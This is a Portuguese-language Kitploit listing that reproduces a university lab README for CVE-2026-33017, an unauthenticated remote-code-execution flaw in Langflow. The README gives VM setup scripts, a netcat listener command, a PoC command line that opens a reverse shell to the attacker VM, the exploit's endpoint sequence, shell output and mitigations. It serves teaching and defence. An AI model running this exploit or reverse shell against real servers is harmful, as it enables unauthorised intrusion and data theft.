Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33017 — # Laboratório educacional demonstrando RCE não autenticado no Langflow via CVE-2026-33017, com configuração automatizada de VM e um exploit PoC para reverse shell. | Kitploit
Ferramentas/GitHubGitHub/jorrit-vm/cve-2026-33017
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso RemotoDesenvolvimento de PayloadsLabs e Prática
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

# Laboratório educacional demonstrando RCE não autenticado no Langflow via CVE-2026-33017, com configuração automatizada de VM e um exploit PoC para reverse shell.

16há 4 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33017 — Langflow RCE sem autenticação

HoGent CyberSecurity II — Testes de Penetração e Exploração de Redes (NPE)
Ano letivo 2025–2026

CVE CVSS Langflow


Visão geral

Este repositório contém um ambiente de laboratório completo e uma demonstração de exploração da CVE-2026-33017, uma vulnerabilidade crítica de Execução Remota de Código (RCE) sem autenticação no Langflow ≤ 1.8.1.

Um atacante sem qualquer autenticação pode executar código Python arbitrário no servidor através do endpoint /api/v1/build_public_tmp/{flow_id}/flow, uma vez que a entrada do utilizador é passada diretamente para exec() do Python sem sandboxing ou validação.

⚠️ Aviso: Este repositório destina-se exclusivamente a fins educativos num ambiente de laboratório controlado. Utilize apenas em sistemas para os quais tenha autorização explícita.


Arquitetura

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   MÁQUINA ANFITRIÃ                  │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Vítima │     │    Kali-Atacante      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    ferramenta PoC     │ │
│  │  porta 7860      │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Rede host-only: 192.168.56.0/24            │
└─────────────────────────────────────────────────────┘

Estrutura do repositório

root@kitploit:~
CVE-2026-33017/
├── README.md # Este ficheiro
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Guia completo de implementação e ataque
└── scripts/
├── setup_vms.sh # Fase 1: Criar VMs VirtualBox (ANFITRIÃ)
├── setup_victim.sh # Fase 2: Instalar Langflow 1.8.1 (VM Ubuntu)
└── setup_attacker.sh # Fase 3: Instalar ferramenta PoC (VM Kali)

Início rápido

Pré-requisitos

  • VirtualBox 7.x com VBoxManage no PATH
  • Ubuntu_22.04-VB-64bit.vdi → renomear para ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → renomear para kali-linux.vdi
  • Ambos os ficheiros VDI na mesma pasta que setup_vms.sh

Fase 1 — Criar VMs (na máquina anfitriã)

root@kitploit:~
bash scripts/setup_vms.sh

Fase 2 — Configurar VM vítima (na VM Ubuntu)

root@kitploit:~
# Credenciais: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

Fase 3 — Configurar VM atacante (na VM Kali)

root@kitploit:~
# Credenciais: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

Executar o ataque

Terminal 1 — Listener de reverse shell:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — Exploit:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

O PoC é instalado automaticamente pelo setup_attacker.sh.
PoC utilizado: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


Como funciona o exploit

PassoEndpointDescrição
1GET /api/v1/auto_loginObtém token JWT de superutilizador (AUTO_LOGIN=true)
2POST /api/v1/flows/Cria novo flow público através da API
3POST /api/v1/build_public_tmp/{id}/flowInjeta CustomComponent com código Python malicioso
4exec() em validate.py:397O código é executado sem sandboxing — RCE

Prova de execução

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


Mitigação

  • Atualizar para Langflow ≥ 1.9.0 — remove o parâmetro data vulnerável
  • Desativar LANGFLOW_AUTO_LOGIN em produção
  • Restringir o acesso de rede à porta 7860 através de firewall
  • Colocar Langflow atrás de um proxy reverso com autenticação

Referências

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Explorado em 20 horas
  • SonicWall — Análise técnica
  • PoC por omer-efe-curkus

HoGent — Informática Aplicada — CyberSecurity II — 2025–2026

Baixar ferramenta